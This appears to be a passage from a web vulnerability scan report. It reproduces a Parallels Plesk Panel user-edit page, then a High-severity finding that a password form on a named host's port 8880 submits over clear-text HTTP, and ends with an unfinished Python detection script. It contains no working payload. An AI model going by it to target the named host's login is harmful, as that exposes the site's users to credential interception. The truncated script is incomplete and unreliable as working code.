// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/edit

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/edit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.nosedivesailing.com:8880/smb/web/edit (the form form-nal-web-edit in the response below has an empty action attribute, so it posts back to the URL it was served from). The form contains the following password fields: userAccount[password], userAccount[confirmPassword]
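The following Python check is added here as an example; it is not code from the XSS.CX report or from Plesk. It reproduces the logic behind this finding: collect every form on a page, resolve the form action the way a browser does (a relative action resolves against the page URL; an empty or missing action posts back to the page URL itself), and flag any form that carries a password input and would submit over http://. The function and variable names are mine; the sample HTML is a trimmed excerpt of the /smb/web/edit response reproduced in this section.

```python
"""Flag forms that would submit a password field over clear-text HTTP.

Added example, not code from the XSS.CX report or from Plesk. The function
and variable names are mine; the sample HTML is a trimmed excerpt of the
/smb/web/edit response reproduced in this section.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Record each <form>'s action attribute and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "password_fields": [str, ...]}, ...]
        self._current = None

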